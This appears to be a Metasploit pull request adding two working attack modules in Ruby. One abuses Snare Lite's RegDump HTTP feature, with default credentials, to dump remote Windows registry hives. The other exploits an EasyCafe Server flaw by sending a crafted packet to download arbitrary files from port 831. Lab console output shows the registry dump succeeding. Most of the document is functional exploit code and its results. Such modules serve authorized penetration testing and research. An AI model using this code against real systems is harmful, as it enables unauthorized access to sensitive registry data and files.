### PR TITLE
Add Snare Lite for Windows Registry Access module

### DIFF
--- a/modules/auxiliary/gather/snare_registry.rb
+++ b/modules/auxiliary/gather/snare_registry.rb
@@ -1,0 +1,184 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  HttpFingerprint = { :pattern => [ /SNARE/ ] }
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'Snare Lite for Windows Registry Access',
+      'Description'   => %q{
+          This module uses the Registry Dump feature of the Snare Lite
+        for Windows service on 6161/TCP to retrieve the Windows registry.
+        The Dump Registry functionality is unavailable in Snare Enterprise.
+
+        Note: The Dump Registry functionality accepts only one connected
+        client at a time. Requesting a large key/hive will cause the service
+        to become unresponsive until the server completes the request.
+      },
+      'Platform'      => 'win',
+      'Author'        => [ 'Brendan Coles <bcoles[at]gmail.com>' ],
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          [ 'URL', 'https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf' ]
+        ],
+      'Actions'       =>
+        [
+          [ 'System Information', 'Description' => 'Retrieve information about the system' ],
+          [ 'Snare Information', 'Description' => 'Retrieve information about the Snare installation' ],
+          [ 'Dump Registry Key', 'Description' => 'Retrieve a specified registry key, including all sub-keys' ],
+          [ 'Dump Registry Hive', 'Description' => 'Retrieve a specified registry hive, including all sub-keys' ],
+          [ 'Dump Registry', 'Description' => 'Retrieve the entire Windows registry. (Note: this may take a while)' ]
+        ],
+      'DefaultAction' => 'System Information'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(6161),
+        OptString.new('USERNAME', [ false, 'The username for Snare remote access', 'snare' ]),
+        OptString.new('PASSWORD', [ false, 'The password for Snare remote access', '' ]),
+        OptString.new('REG_KEY', [ false, 'The registry key to retrieve', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]),
+        OptString.new('REG_HIVE', [ false, 'The registry hive to retrieve', 'HKLM' ]),
+        OptInt.new('TIMEOUT', [true, 'Timeout in seconds for downloading each registry key/hive', 300])
+      ], self.class)
+  end
+
+  def run
+    case action.name
+    when 'System Information'
+      dump_key('HKLM\\HARDWARE\\DESCRIPTION\\System')
+    when 'Snare Information'
+      dump_key('HKLM\\Software\\InterSect Alliance')
+    when 'Dump Registry Key'
+      dump_key(datastore['REG_KEY'])
+    when 'Dump Registry Hive'
+      dump_hive(datastore['REG_HIVE'])
+    when 'Dump Registry'
+      dump_all
+    end
+  end
+
+  #
+  # Retrieve the supplied registry key
+  #
+  def dump_key(reg_key)
+    if reg_key.nil? || reg_key.empty?
+      fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name")
+    end
+    hive = reg_key.split('\\').first
+    key = reg_key.split('\\')[1..-1].join('\\\\')
+    if key.nil? || key.empty? || hive !~ /\A[A-Z0-9_]+\z/i
+      fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name")
+    end
+    print_status("#{peer} - Retrieving registry key '#{hive}\\\\#{key}'...")
+    res = send_request_cgi({
+      'uri' => normalize_uri('RegDump'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'vars_get' => {
+        'str_Base' => hive,
+        'str_SubKey' => key
+      }
+    }, datastore['TIMEOUT'])
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    elsif res.code && res.code == 401
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    elsif res.code && res.code == 404
+      fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable")
+    elsif res.code && res.code == 200 && res.body && res.body =~ /\AKEY: /
+      print_good("#{peer} - Retrieved key successfully (#{res.body.length} bytes)")
+    elsif res.code && res.code == 200 && res.body && res.body =~ /the supplied subkey cannot be found/
+      fail_with(Failure::NotFound, "#{peer} - The supplied registry key does not exist")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)")
+    end
+    path = store_loot(
+      'snare.registry.key',
+      'text/plain',
+      datastore['RHOST'],
+      res.body,
+      reg_key.gsub(/[^\w]/, '_').downcase
+    )
+    print_good("File saved in: #{path}")
+  end
+
+  #
+  # Retrieve the supplied registry hive
+  #
+  def dump_hive(hive)
+    if hive !~ /\A[A-Z0-9_]+\z/i
+      fail_with(Failure::BadConfig, "#{peer} - Please supply a valid hive name")
+    end
+    print_status("#{peer} - Retrieving registry hive '#{hive}' ...")
+    res = send_request_cgi({
+      'uri' => normalize_uri('RegDump'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+      'vars_get' => { 'str_Base' => hive }
+    }, datastore['TIMEOUT'])
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    elsif res.code && res.code == 401
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    elsif res.code && res.code == 404
+      fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable")
+    elsif res.code && res.code == 200 && res.body && res.body =~ /\AKEY: /
+      print_good("#{peer} - Retrieved hive successfully (#{res.body.length} bytes)")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)")
+    end
+    path = store_loot(
+      'snare.registry.hive',
+      'text/plain',
+      datastore['RHOST'],
+      res.body,
+      hive.gsub(/[^\w]/, '_').downcase
+    )
+    print_good("File saved in: #{path}")
+  end
+
+  #
+  # Retrieve list of registry hives
+  #
+  def retrieve_hive_list
+    hives = []
+    print_status("#{peer} - Retrieving list of registry hives ...")
+    res = send_request_cgi(
+      'uri' => normalize_uri('RegDump'),
+      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
+    )
+    if !res
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+    elsif res.code && res.code == 401
+      fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
+    elsif res.code && res.code == 404
+      fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable")
+    elsif res.code && res.code == 200 && res.body && res.body =~ /RegDump\?str_Base/
+      hives = res.body.scan(%r{<li><a href="\/RegDump\?str_Base=([a-zA-Z0-9_]+)">}).flatten
+      vprint_good("#{peer} - Found #{hives.length} registry hives (#{hives.join(', ')})")
+    else
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)")
+    end
+    hives
+  end
+
+  #
+  # Retrieve all registry hives
+  #
+  def dump_all
+    hives = retrieve_hive_list
+    if hives.nil? || hives.empty?
+      print_error("#{peer} - Found no registry hives")
+      return
+    end
+    hives.each { |hive| dump_hive(hive) }
+  end
+end

--- a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
+++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb
@@ -1,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'EasyCafe Server Remote File Access',
+      'Description' => %q{
+          This module exploits a file retrieval vulnerability in
+        EasyCafe Server. The vulnerability can be triggered by
+        sending a specially crafted packet (opcode 0x43) to the
+        831/TCP port.
+        This module has been successfully tested on EasyCafe Server
+        version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3
+        and Windows 7 SP1.
+        Note that the server will throw a popup messagebox if the
+        specified file does not exist.
+      },
+      'License'     => MSF_LICENSE,
+      'Author'      =>
+        [
+          'R-73eN', # Vulnerability Discovery
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
+        ],
+      'References'  =>
+        [
+          [ 'EDB', '39102' ]
+        ]
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(831),
+        OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts'])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error('Please supply the name of the file you want to download')
+      return
+    end
+
+    file_path = datastore['FILEPATH']
+    packet = "\x43"
+    packet << file_path
+    packet << "\x00" * (255 - file_path.length)
+    packet << "\x01\x00\x00\x00\x01"
+
+    vprint_status("#{peer} - Sending request (#{packet.length} bytes)")
+    connect
+    sock.put(packet)
+    res = sock.get(15)
+    disconnect
+    unless res
+      print_error("#{peer} - Unable to retrieve file due to a timeout.")
+      return
+    end
+    vprint_status("#{peer} - Received response (#{res.length} bytes)")
+
+    # Extract file contents
+    # Content begins after \x00\x01
+    contents = res.sub(/\A.*?\x00\x01/m, '').to_s
+    if contents.nil? || contents.empty?
+      print_error("#{peer} - Unexpected reply. Unable to extract contents")
+      return
+    end
+    print_status("#{peer} - File retrieved successfully (#{contents.length} bytes)!")
+    path = store_loot(
+      'easycafe_server',
+      'application/octet-stream',
+      ip,
+      contents,
+      File.basename(file_path)
+    )
+    print_status("File saved in: #{path}")
+  end
+end


### PR DESCRIPTION
This module uses the Registry Dump feature of the Snare Lite Open Source for Windows service on 6161/TCP to retrieve the Windows registry.

Tested on Snare for Windows version 4.0.2.0 on Windows XP SP3
- Software: http://sourceforge.net/projects/snare/files/Snare%20for%20Windows/4.0.2.0/
### Example Usage

```
msf > use auxiliary/gather/snare_registry 
msf auxiliary(snare_registry) > set rhost 192.168.18.155
rhost => 192.168.18.155
msf auxiliary(snare_registry) > set password snare
password => snare
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
[+] File saved in: /root/.msf4/loot/20151225094851_default_192.168.18.155_snare.registry.k_502556.txt
[*] Auxiliary module execution completed
msf auxiliary(snare_registry) > set REG_KEY HKLM\\doesnotexist
REG_KEY => HKLM\doesnotexist
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\doesnotexist'...
[-] Auxiliary failed: RuntimeError not-found: 192.168.18.155:6161 - The supplied registry key does not exist
[-] Call stack:
[-]   /pentest/exploit/metasploit-framework/lib/msf/core/module.rb:291:in `fail_with'
[-]   /pentest/exploit/metasploit-framework/modules/auxiliary/gather/snare_registry.rb:96:in `dump_key'
[-]   /pentest/exploit/metasploit-framework/modules/auxiliary/gather/snare_registry.rb:60:in `run'
[*] Auxiliary module execution completed
msf auxiliary(snare_registry) > set action Snare Information 
action => Snare Information
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\Software\\InterSect Alliance'...
[+] 192.168.18.155:6161 - Retrieved key successfully (2379 bytes)
[+] File saved in: /root/.msf4/loot/20151225094854_default_192.168.18.155_snare.registry.k_293326.txt
[*] Auxiliary module execution completed
msf auxiliary(snare_registry) > set action Dump Registry Key
action => Dump Registry Key
rmsf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
[+] File saved in: /root/.msf4/loot/20151225094900_default_192.168.18.155_snare.registry.k_768238.txt
[*] Auxiliary module execution completed
msf auxiliary(snare_registry) > set action Dump Registry Hive
action => Dump Registry Hive
rumsf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM' ...
[+] 192.168.18.155:6161 - Retrieved hive successfully (10620716 bytes)
[+] File saved in: /root/.msf4/loot/20151225095018_default_192.168.18.155_snare.registry.h_016688.txt
[*] Auxiliary module execution completed
msf auxiliary(snare_registry) > set verbose true
verbose => true
msf auxiliary(snare_registry) > set action Dump Registry
action => Dump Registry
msf auxiliary(snare_registry) > run

[*] 192.168.18.155:6161 - Retrieving list of registry hives ...
[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT' ...
[+] 192.168.18.155:6161 - Retrieved hive successfully (3933816 bytes)
[+] File saved in: /root/.msf4/loot/20151225095110_default_192.168.18.155_snare.registry.h_875642.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG' ...
[+] 192.168.18.155:6161 - Retrieved hive successfully (5605 bytes)
[+] File saved in: /root/.msf4/loot/20151225095110_default_192.168.18.155_snare.registry.h_391575.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER' ...
[+] 192.168.18.155:6161 - Retrieved hive successfully (269927 bytes)
[+] File saved in: /root/.msf4/loot/20151225095111_default_192.168.18.155_snare.registry.h_025154.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE' ...
[+] 192.168.18.155:6161 - Retrieved hive successfully (11409691 bytes)
[+] File saved in: /root/.msf4/loot/20151225095224_default_192.168.18.155_snare.registry.h_728836.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS' ...
[+] 192.168.18.155:6161 - Retrieved hive successfully (1661004 bytes)
[+] File saved in: /root/.msf4/loot/20151225095230_default_192.168.18.155_snare.registry.h_119567.txt
[*] Auxiliary module execution completed
```
